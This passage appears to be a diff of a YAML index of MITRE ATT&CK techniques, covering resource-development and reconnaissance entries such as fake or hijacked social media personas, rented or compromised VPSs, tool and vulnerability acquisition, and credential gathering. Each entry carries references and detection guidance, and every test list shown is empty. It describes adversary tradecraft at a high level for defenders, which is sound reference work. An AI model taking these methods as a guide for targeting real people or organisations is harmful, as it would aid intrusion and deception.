+ description: Lennon, M. (2014, May 29). Iranian Hackers Targeted US Officials
+ in Elaborate Social Media Attack Operation. Retrieved March 1, 2017.
+ url: https://www.securityweek.com/iranian-hackers-targeted-us-officials-elaborate-social-media-attack-operation
+ - source_name: BlackHatRobinSage
+ description: Ryan, T. (2010). “Getting In Bed with Robin Sage.”. Retrieved
+ March 6, 2017.
+ url: http://media.blackhat.com/bh-us-10/whitepapers/Ryan/BlackHat-USA-2010-Ryan-Getting-In-Bed-With-Robin-Sage-v1.0.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Social Media Accounts
+ description: "Before compromising a victim, adversaries may create and cultivate
+ social media accounts that can be used during targeting. Adversaries can create
+ social media accounts that can be used to build a persona to further operations.
+ Persona development consists of the development of public information, presence,
+ history and appropriate affiliations.(Citation: NEWSCASTER2014)(Citation:
+ BlackHatRobinSage)\n\nFor operations incorporating social engineering, the
+ utilization of a persona on social media may be important. These personas
+ may be fictitious or impersonate real people. The persona may exist on a single
+ social media site or across multiple sites (ex: Facebook, LinkedIn, Twitter,
+ etc.). Establishing a persona on social media may require development of
+ additional documentation to make them seem real. This could include filling
+ out profile information, developing social networks, or incorporating photos.
+ \n\nOnce a persona has been developed an adversary can use it to create connections
+ to targets of interest. These connections may be direct or may include trying
+ to connect through others.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage)
+ These accounts may be leveraged during other phases of the adversary lifecycle,
+ such as during Initial Access (ex: [Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003))."
+ id: attack-pattern--b1ccd744-3f78-4a0e-9bb2-2002057f7928
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: resource-development
+ modified: '2020-10-20T17:58:13.557Z'
+ created: '2020-10-01T01:08:41.124Z'
+ x_mitre_data_sources:
+ - Social media monitoring
+ x_mitre_detection: |-
+ Consider monitoring social media activity related to your organization. Suspicious activity may include personas claiming to work for your organization or recently created/modified accounts making numerous connection requests to accounts affiliated with your organization.
+
+ Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access (ex: [Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003)).
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1586.001:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1586.001
+ url: https://attack.mitre.org/techniques/T1586/001
+ - source_name: AnonHBGary
+ description: 'Bright, P. (2011, February 15). Anonymous speaks: the inside
+ story of the HBGary hack. Retrieved March 9, 2017.'
+ url: https://arstechnica.com/tech-policy/2011/02/anonymous-speaks-the-inside-story-of-the-hbgary-hack/
+ - source_name: NEWSCASTER2014
+ description: Lennon, M. (2014, May 29). Iranian Hackers Targeted US Officials
+ in Elaborate Social Media Attack Operation. Retrieved March 1, 2017.
+ url: https://www.securityweek.com/iranian-hackers-targeted-us-officials-elaborate-social-media-attack-operation
+ - source_name: BlackHatRobinSage
+ description: Ryan, T. (2010). “Getting In Bed with Robin Sage.”. Retrieved
+ March 6, 2017.
+ url: http://media.blackhat.com/bh-us-10/whitepapers/Ryan/BlackHat-USA-2010-Ryan-Getting-In-Bed-With-Robin-Sage-v1.0.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Social Media Accounts
+ description: "Before compromising a victim, adversaries may compromise social
+ media accounts that can be used during targeting. For operations incorporating
+ social engineering, the utilization of an online persona may be important.
+ Rather than creating and cultivating social media profiles (i.e. [Social Media
+ Accounts](https://attack.mitre.org/techniques/T1585/001)), adversaries may
+ compromise existing social media accounts. Utilizing an existing persona may
+ engender a level of trust in a potential victim if they have a relationship,
+ or knowledge of, the compromised persona. \n\nA variety of methods exist for
+ compromising social media accounts, such as gathering credentials via [Phishing
+ for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials
+ from third-party sites, or by brute forcing credentials (ex: password reuse
+ from breach credential dumps).(Citation: AnonHBGary) Prior to compromising
+ social media accounts, adversaries may conduct Reconnaissance to inform decisions
+ about which accounts to compromise to further their operation.\n\nPersonas
+ may exist on a single site or across multiple sites (ex: Facebook, LinkedIn,
+ Twitter, etc.). Compromised social media accounts may require additional development,
+ this could include filling out or modifying profile information, further developing
+ social networks, or incorporating photos.\n\nAdversaries can use a compromised
+ social media profile to create new, or hijack existing, connections to targets
+ of interest. These connections may be direct or may include trying to connect
+ through others.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage) Compromised
+ profiles may be leveraged during other phases of the adversary lifecycle,
+ such as during Initial Access (ex: [Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003))."
+ id: attack-pattern--274770e0-2612-4ccf-a678-ef8e7bad365d
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: resource-development
+ modified: '2020-10-20T17:57:43.708Z'
+ created: '2020-10-01T01:18:35.535Z'
+ x_mitre_data_sources:
+ - Social media monitoring
+ x_mitre_detection: |-
+ Consider monitoring social media activity related to your organization. Suspicious activity may include personas claiming to work for your organization or recently modified accounts making numerous connection requests to accounts affiliated with your organization.
+
+ Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access (ex: [Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003)).
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1588.002:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1588.002
+ url: https://attack.mitre.org/techniques/T1588/002
+ - source_name: Recorded Future Beacon 2019
+ url: https://www.recordedfuture.com/identifying-cobalt-strike-servers/
+ description: 'Recorded Future. (2019, June 20). Out of the Blue: How Recorded
+ Future Identified Rogue Cobalt Strike Servers. Retrieved October 16, 2020.'
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Tool
+ description: |-
+ Before compromising a victim, adversaries may buy, steal, or download software tools that can be used during targeting. Tools can be open or closed source, free or commercial. A tool can be used for malicious purposes by an adversary, but (unlike malware) were not intended to be used for those purposes (ex: [PsExec](https://attack.mitre.org/software/S0029)). Tool acquisition can involve the procurement of commercial software licenses, including for red teaming tools such as [Cobalt Strike](https://attack.mitre.org/software/S0154). Commercial software may be obtained through purchase, stealing licenses (or licensed copies of the software), or cracking trial versions.(Citation: Recorded Future Beacon 2019)
+
+ Adversaries may obtain tools to support their operations, including to support execution of post-compromise behaviors. In addition to freely downloading or purchasing software, adversaries may steal software and/or software licenses from third-party entities (including other adversaries).
+ id: attack-pattern--a2fdce72-04b2-409a-ac10-cc1695f4fce0
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: resource-development
+ modified: '2020-10-20T14:46:37.477Z'
+ created: '2020-10-01T02:08:33.977Z'
+ x_mitre_detection: Much of this activity will take place outside the visibility
+ of the target organization, making detection of this behavior difficult. Detection
+ efforts may be focused on post-compromise phases of the adversary lifecycle.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1583.003:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1583.003
+ url: https://attack.mitre.org/techniques/T1583/003
+ - source_name: TrendmicroHideoutsLease
+ description: 'Max Goncharov. (2015, July 15). Criminal Hideouts for Lease:
+ Bulletproof Hosting Services. Retrieved March 6, 2017.'
+ url: https://documents.trendmicro.com/assets/wp/wp-criminal-hideouts-for-lease.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Virtual Private Server
+ description: |-
+ Before compromising a victim, adversaries may rent Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. By utilizing a VPS, adversaries can make it difficult to physically tie back operations to them. The use of cloud infrastructure can also make it easier for adversaries to rapidly provision, modify, and shut down their infrastructure.
+
+ Acquiring a VPS for use in later stages of the adversary lifecycle, such as Command and Control, can allow adversaries to benefit from the ubiquity and trust associated with higher reputation cloud service providers. Adversaries may also acquire infrastructure from VPS service providers that are known for renting VPSs with minimal registration information, allowing for more anonymous acquisitions of infrastructure.(Citation: TrendmicroHideoutsLease)
+ id: attack-pattern--79da0971-3147-4af6-a4f5-e8cd447cd795
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: resource-development
+ modified: '2020-10-22T17:58:32.476Z'
+ created: '2020-10-01T00:44:23.935Z'
+ x_mitre_detection: Much of this activity will take place outside the visibility
+ of the target organization, making detection of this behavior difficult. Detection
+ efforts may be focused on related stages of the adversary lifecycle, such
+ as during Command and Control.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1584.003:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1584.003
+ url: https://attack.mitre.org/techniques/T1584/003
+ - source_name: NSA NCSC Turla OilRig
+ url: https://media.defense.gov/2019/Oct/18/2002197242/-1/-1/0/NSA_CSA_Turla_20191021%20ver%204%20-%20nsa.gov.pdf
+ description: 'NSA/NCSC. (2019, October 21). Cybersecurity Advisory: Turla
+ Group Exploits Iranian APT To Expand Coverage Of Victims. Retrieved October
+ 16, 2020.'
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Virtual Private Server
+ description: |-
+ Before compromising a victim, adversaries may compromise third-party Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. Adversaries may compromise VPSs purchased by third-party entities. By compromising a VPS to use as infrastructure, adversaries can make it difficult to physically tie back operations to themselves.(Citation: NSA NCSC Turla OilRig)
+
+ Compromising a VPS for use in later stages of the adversary lifecycle, such as Command and Control, can allow adversaries to benefit from the ubiquity and trust associated with higher reputation cloud service providers as well as that added by the compromised third-party.
+ id: attack-pattern--39cc9f64-cf74-4a48-a4d8-fe98c54a02e0
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: resource-development
+ modified: '2020-10-22T18:01:45.792Z'
+ created: '2020-10-01T00:55:17.771Z'
+ x_mitre_detection: Much of this activity will take place outside the visibility
+ of the target organization, making detection of this behavior difficult. Detection
+ efforts may be focused on related stages of the adversary lifecycle, such
+ as during Command and Control.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1588.006:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1588.006
+ url: https://attack.mitre.org/techniques/T1588/006
+ - source_name: National Vulnerability Database
+ url: https://nvd.nist.gov/
+ description: National Vulnerability Database. (n.d.). National Vulnerability
+ Database. Retrieved October 15, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Vulnerabilities
+ description: |-
+ Before compromising a victim, adversaries may acquire information about vulnerabilities that can be used during targeting. A vulnerability is a weakness in computer hardware or software that can, potentially, be exploited by an adversary to cause unintended or unanticipated behavior to occur. Adversaries may find vulnerability information by searching open databases or gaining access to closed vulnerability databases.(Citation: National Vulnerability Database)
+
+ An adversary may monitor vulnerability disclosures/databases to understand the state of existing, as well as newly discovered, vulnerabilities. There is usually a delay between when a vulnerability is discovered and when it is made public. An adversary may target the systems of those known to conduct vulnerability research (including commercial vendors). Knowledge of a vulnerability may cause an adversary to search for an existing exploit (i.e. [Exploits](https://attack.mitre.org/techniques/T1588/005)) or to attempt to develop one themselves (i.e. [Exploits](https://attack.mitre.org/techniques/T1587/004)).
+ id: attack-pattern--2b5aa86b-a0df-4382-848d-30abea443327
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: resource-development
+ modified: '2020-10-16T01:54:39.868Z'
+ created: '2020-10-15T02:59:38.628Z'
+ x_mitre_detection: Much of this activity will take place outside the visibility
+ of the target organization, making detection of this behavior difficult. Detection
+ efforts may be focused on behaviors relating to the potential use of exploits
+ for vulnerabilities (i.e. [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190),
+ [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203),
+ [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068),
+ [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211),
+ [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212),
+ [Exploitation of Remote Services](https://attack.mitre.org/techniques/T1210),
+ and [Application or System Exploitation](https://attack.mitre.org/techniques/T1499/004)).
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1583.006:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1583.006
+ url: https://attack.mitre.org/techniques/T1583/006
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Web Services
+ description: Before compromising a victim, adversaries may register for web
+ services that can be used during targeting. A variety of popular websites
+ exist for adversaries to register for a web-based service that can be abused
+ during later stages of the adversary lifecycle, such as during Command and
+ Control ([Web Service](https://attack.mitre.org/techniques/T1102)) or [Exfiltration
+ Over Web Service](https://attack.mitre.org/techniques/T1567). Using common
+ services, such as those offered by Google or Twitter, makes it easier for
+ adversaries to hide in expected noise. By utilizing a web service, adversaries
+ can make it difficult to physically tie back operations to them.
+ id: attack-pattern--88d31120-5bc7-4ce3-a9c0-7cf147be8e54
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: resource-development
+ modified: '2020-10-22T17:59:17.456Z'
+ created: '2020-10-01T00:50:29.936Z'
+ x_mitre_detection: Much of this activity will take place outside the visibility
+ of the target organization, making detection of this behavior difficult. Detection
+ efforts may be focused on related stages of the adversary lifecycle, such
+ as during Command and Control ([Web Service](https://attack.mitre.org/techniques/T1102))
+ or [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567).
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1584.006:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1584.006
+ url: https://attack.mitre.org/techniques/T1584/006
+ - source_name: Recorded Future Turla Infra 2020
+ url: https://www.recordedfuture.com/turla-apt-infrastructure/
+ description: 'Insikt Group. (2020, March 12). Swallowing the Snake’s Tail:
+ Tracking Turla Infrastructure. Retrieved October 20, 2020.'
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Web Services
+ description: 'Before compromising a victim, adversaries may compromise access
+ to third-party web services that can be used during targeting. A variety of
+ popular websites exist for legitimate users to register for web-based services,
+ such as GitHub, Twitter, Dropbox, Google, etc. Adversaries may try to take
+ ownership of a legitimate user''s access to a web service and use that web
+ service as infrastructure in support of cyber operations. Such web services
+ can be abused during later stages of the adversary lifecycle, such as during
+ Command and Control ([Web Service](https://attack.mitre.org/techniques/T1102))
+ or [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567).(Citation:
+ Recorded Future Turla Infra 2020) Using common services, such as those offered
+ by Google or Twitter, makes it easier for adversaries to hide in expected
+ noise. By utilizing a web service, particularly when access is stolen from
+ legitimate users, adversaries can make it difficult to physically tie back
+ operations to them.'
+ id: attack-pattern--ae797531-3219-49a4-bccf-324ad7a4c7b2
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: resource-development
+ modified: '2020-10-22T18:02:30.304Z'
+ created: '2020-10-01T01:01:00.176Z'
+ x_mitre_detection: Much of this activity will take place outside the visibility
+ of the target organization, making detection of this behavior difficult. Detection
+ efforts may be focused on related stages of the adversary lifecycle, such
+ as during Command and Control ([Web Service](https://attack.mitre.org/techniques/T1102))
+ or [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567).
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+reconnaissance:
+ T1595:
+ technique:
+ id: attack-pattern--67073dde-d720-45ae-83da-b12d5e73ca3b
+ description: |-
+ Before compromising a victim, adversaries may execute active reconnaissance scans to gather information that can be used during targeting. Active scans are those where the adversary probes victim infrastructure via network traffic, as opposed to other forms of reconnaissance that do not involve direct interaction.
+
+ Adversaries may perform different forms of active scanning depending on what information they seek to gather. These scans can also be performed in various ways, including using native features of network protocols such as ICMP.(Citation: Botnet Scan)(Citation: OWASP Fingerprinting) Information from these scans may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190)).
+ name: Active Scanning
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1595
+ url: https://attack.mitre.org/techniques/T1595
+ - source_name: Botnet Scan
+ url: https://www.caida.org/publications/papers/2012/analysis_slash_zero/analysis_slash_zero.pdf
+ description: Dainotti, A. et al. (2012). Analysis of a “/0” Stealth Scan from
+ a Botnet. Retrieved October 20, 2020.
+ - source_name: OWASP Fingerprinting
+ url: https://wiki.owasp.org/index.php/OAT-004_Fingerprinting
+ description: OWASP Wiki. (2018, February 16). OAT-004 Fingerprinting. Retrieved
+ October 20, 2020.
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: reconnaissance
+ modified: '2020-10-24T04:06:50.402Z'
+ created: '2020-10-02T16:53:16.526Z'
+ x_mitre_platforms:
+ - PRE
+ x_mitre_is_subtechnique: false
+ x_mitre_version: '1.0'
+ x_mitre_detection: |-
+ Monitor for suspicious network traffic that could be indicative of scanning, such as large quantities originating from a single source (especially if the source is known to be associated with an adversary/botnet). Analyzing web metadata may also reveal artifacts that can be attributed to potentially malicious activity, such as referer or user-agent string HTTP/S fields.
+
+ Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
+
+ Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+ x_mitre_data_sources:
+ - Packet capture
+ - Network device logs
+ atomic_tests: []
+ T1591.002:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1591.002
+ url: https://attack.mitre.org/techniques/T1591/002
+ - source_name: ThreatPost Broadvoice Leak
+ url: https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/
+ description: Seals, T. (2020, October 15). Broadvoice Leak Exposes 350M Records,
+ Personal Voicemail Transcripts. Retrieved October 20, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Business Relationships
+ description: |-
+ Before compromising a victim, adversaries may gather information about the victim's business relationships that can be used during targeting. Information about an organization’s business relationships may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access. This information may also reveal supply chains and shipment paths for the victim’s hardware and software resources.
+
+ Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about business relationships may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: ThreatPost Broadvoice Leak) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195), [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).
+ id: attack-pattern--6ee2dc99-91ad-4534-a7d8-a649358c331f
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: reconnaissance
+ modified: '2020-10-24T04:08:59.209Z'
+ created: '2020-10-02T16:27:55.713Z'
+ x_mitre_detection: |-
+ Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
+
+ Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1596.004:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1596.004
+ url: https://attack.mitre.org/techniques/T1596/004
+ - source_name: DigitalShadows CDN
+ url: https://www.digitalshadows.com/blog-and-research/content-delivery-networks-cdns-can-leave-you-exposed-how-you-might-be-affected-and-what-you-can-do-about-it/
+ description: Swisscom & Digital Shadows. (2017, September 6). Content Delivery
+ Networks (CDNs) Can Leave You Exposed – How You Might Be Affected And What
+ You Can Do About It. Retrieved October 20, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: CDNs
+ description: |-
+ Before compromising a victim, adversaries may search content delivery network (CDN) data about victims that can be used during targeting. CDNs allow an organization to host content from a distributed, load balanced array of servers. CDNs may also allow organizations to customize content delivery based on the requestor’s geographical region.
+
+ Adversaries may search CDN data to gather actionable information. Threat actors can use online resources and lookup tools to harvest information about content servers within a CDN. Adversaries may also seek and target CDN misconfigurations that leak sensitive information not intended to be hosted and/or do not have the same protection mechanisms (ex: login portals) as the content hosted on the organization’s website.(Citation: DigitalShadows CDN) Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [Drive-by Compromise](https://attack.mitre.org/techniques/T1189)).
+ id: attack-pattern--91177e6d-b616-4a03-ba4b-f3b32f7dda75
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: reconnaissance
+ modified: '2020-10-24T04:17:09.684Z'
+ created: '2020-10-02T16:59:56.648Z'
+ x_mitre_detection: |-
+ Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
+
+ Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1592.004:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1592.004
+ url: https://attack.mitre.org/techniques/T1592/004
+ - source_name: ATT ScanBox
+ url: https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks
+ description: 'Blasco, J. (2014, August 28). Scanbox: A Reconnaissance Framework
+ Used with Watering Hole Attacks. Retrieved October 19, 2020.'
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Client Configurations
+ description: |-
+ Before compromising a victim, adversaries may gather information about the victim's client configurations that can be used during targeting. Information about client configurations may include a variety of details and settings, including operating system/version, virtualization, architecture (ex: 32 or 64 bit), language, and/or time zone.
+
+ Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) (ex: listening ports, server banners, user agent strings) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about the client configurations may also be exposed to adversaries via online or other accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase invoices). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).
+ id: attack-pattern--774ad5bb-2366-4c13-a8a9-65e50b292e7c
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: reconnaissance
+ modified: '2020-10-24T03:52:10.774Z'
+ created: '2020-10-02T16:47:16.719Z'
+ x_mitre_detection: |-
+ Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
+
+ Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ atomic_tests: []
+ T1589.001:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1589.001
+ url: https://attack.mitre.org/techniques/T1589/001
+ - source_name: ATT ScanBox
+ url: https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks
+ description: 'Blasco, J. (2014, August 28). Scanbox: A Reconnaissance Framework
+ Used with Watering Hole Attacks. Retrieved October 19, 2020.'
+ - source_name: Register Deloitte
+ url: https://www.theregister.com/2017/09/26/deloitte_leak_github_and_google/
+ description: 'Thomson, I. (2017, September 26). Deloitte is a sitting duck:
+ Key systems with RDP open, VPN and proxy ''login details leaked''. Retrieved
+ October 19, 2020.'
+ - source_name: Register Uber
+ url: https://www.theregister.com/2015/02/28/uber_subpoenas_github_for_hacker_details/
+ description: McCarthy, K. (2015, February 28). FORK ME! Uber hauls GitHub
+ into court to find who hacked database of 50,000 drivers. Retrieved October
+ 19, 2020.
+ - source_name: Detectify Slack Tokens
+ url: https://labs.detectify.com/2016/04/28/slack-bot-token-leakage-exposing-business-critical-information/
+ description: Detectify. (2016, April 28). Slack bot token leakage exposing
+ business critical information. Retrieved October 19, 2020.
+ - source_name: Forbes GitHub Creds
+ url: https://www.forbes.com/sites/runasandvik/2014/01/14/attackers-scrape-github-for-cloud-service-credentials-hijack-account-to-mine-virtual-currency/#242c479d3196
+ description: Sandvik, R. (2014, January 14). Attackers Scrape GitHub For Cloud
+ Service Credentials, Hijack Account To Mine Virtual Currency. Retrieved
+ October 19, 2020.
+ - source_name: GitHub truffleHog
+ url: https://github.com/dxa4481/truffleHog
+ description: Dylan Ayrey. (2016, December 31). truffleHog. Retrieved October
+ 19, 2020.
+ - source_name: GitHub Gitrob
+ url: https://github.com/michenriksen/gitrob
+ description: 'Michael Henriksen. (2018, June 9). Gitrob: Putting the Open
+ Source in OSINT. Retrieved October 19, 2020.'
+ - source_name: CNET Leaks
+ url: https://www.cnet.com/news/massive-breach-leaks-773-million-emails-21-million-passwords/
+ description: Ng, A. (2019, January 17). Massive breach leaks 773 million email
+ addresses, 21 million passwords. Retrieved October 20, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Credentials
+ description: |-
+ Before compromising a victim, adversaries may gather credentials that can be used during targeting. Account credentials gathered by adversaries may be those directly associated with the target victim organization or attempt to take advantage of the tendency for users to use the same passwords across personal and business accounts.
+
+ Adversaries may gather credentials from potential victims in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect website authentication cookies from visitors.(Citation: ATT ScanBox) Credential information may also be exposed to adversaries via leaks to online or other accessible data sets (ex: [Search Engines](https://attack.mitre.org/techniques/T1593/002), breach dumps, code repositories, etc.).(Citation: Register Deloitte)(Citation: Register Uber)(Citation: Detectify Slack Tokens)(Citation: Forbes GitHub Creds)(Citation: GitHub truffleHog)(Citation: GitHub Gitrob)(Citation: CNET Leaks) Adversaries may also purchase credentials from dark web or other black-markets. Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Compromise 